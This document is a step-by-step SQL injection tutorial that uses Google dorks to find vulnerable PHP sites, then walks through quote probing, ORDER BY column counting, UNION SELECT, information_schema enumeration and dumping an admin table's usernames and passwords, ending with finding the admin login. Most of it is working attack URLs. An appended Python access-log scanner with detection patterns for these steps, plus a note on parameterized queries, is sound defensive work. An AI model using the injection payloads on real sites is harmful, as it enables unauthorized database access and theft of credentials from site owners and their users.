Keywords you need to know
-------------------------------
Characters : ', -
Comments : /*, --
-------------------------------
Information: information_schema only works on MySQL version 5.x and above
The Google dorks that will be used are ->
"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="
-------------------------First Step-------------------------
www.target.com/news.php?id=1
---add the character ' at the end of the url to see if the site is vulnerable to
SQL injection or not.
Injection sample code:-
www.target.com/news.php?id=1'
or
www.target.com/news.php?id=-1
Examples of error messages:-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
-------------------------Second Step-------------------------
Find the number of tables available in the database.
Add : +order+by+1-- at the end of url
Example:
Code:
www.target.com/news.php?id=1+order+by+1--
or
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep going until it errors out
For this tutorial the table amount obtained was 3.
-------------------------Third Step-------------------------
Use the UNION command to bring out the numbers that we will use later.
Command to be used : +union+select+1,2,3-- at the end of the url
Example
www.target.com/news.php?id=1+union+select+1,2,3--
Example: number 2 comes out.
Then we enter version() in place of number (2),
Example:
www.target.com/news.php?id=1+union+select+1,version(),3--
and the version will be displayed in place of that figure.
Example:
5.1.47-community-log
------
|info|
------
version() = to see the MySQL version used
database() = to see the database name used
-------------------------Fourth Step-------------------------
To see the names of the tables that are in the web database, put
table_name in the figure that came out earlier -> (2), and
+from+information_schema.tables-- ---> goes after the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
or we add the character - in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--
-------------------------Fifth Step-------------------------
Dump all the table names in the current database,
group_concat(table_name) ---> put in the figure that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> put after the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
-------------------------Sixth Step-------------------------
Bring out the column names that are in the TABLE
group_concat(column_name) ---> put in the figure that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResultOfConvertedTableNameAdmin--
(THE TABLE NAME HAS BEEN CONVERTED TO HEXADECIMAL)
------
|info|
------
Websites that can be used to convert the table name to hexadecimal
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
The table we will use as the example is the table ADMIN,
and the converted result is 41444D494E
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
-------------------------Seventh Step-------------------------
Dump the contents of the table Admin that we managed to find
concat_ws(0x3a,"column names contained in the table ADMIN") ---> put in the figure that came out earlier (2)
+from+Admin-- --> the original table
Example:
www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--
And we obtain the admin username and password for the website.
Then you have to find the admin login :)....
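From the defender's side, the step-by-step probing described above leaves a recognisable trail in the web server's access log. The scanner below is an added example, not part of the original tutorial; the log lines are constructed, and the indicator names are my own labels for the patterns the steps use.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators of the probing sequence in the tutorial, matched against the decoded query string.
INDICATORS = {
    "quote_probe": re.compile(r"=\s*-?\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "fingerprint_fn": re.compile(r"\b(version|database)\s*\(\s*\)", re.I),
    "concat_dump": re.compile(r"\b(group_concat|concat_ws)\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "comment_trailer": re.compile(r"(--|/\*)\s*$"),
}

# Constructed sample access log (Apache combined format); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=1+order+by+3-- HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=-1+union+select+1,version(),3-- HTTP/1.1" 200 4870
203.0.113.5 - - [10/Oct/2023:13:57:01 +0000] "GET /news.php?id=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E-- HTTP/1.1" 200 4990
198.51.100.9 - - [10/Oct/2023:13:57:05 +0000] "GET /news.php?id=42 HTTP/1.1" 200 5088
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def scan_log(text):
    """Return (ip, path, status, [indicator names]) for each flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # unquote_plus also turns the '+' used in the tutorial's URLs into spaces
        query = unquote_plus(urlsplit(m["path"]).query)
        names = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if names:
            hits.append((m["ip"], m["path"], int(m["status"]), names))
    return hits

def hits_per_source(hits):
    """Count flagged requests per client IP; one client walking the whole sequence stands out."""
    counts = {}
    for ip, _, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    for ip, path, status, names in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(names), path)
```

The mysql_fetch_array() warning in the first step shows the id parameter is concatenated straight into the SQL string, so alongside the alert the root cause is removed by passing id through a parameterized query.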
A shorter tutorial:-
http://pastebin.com/pVVjSzhF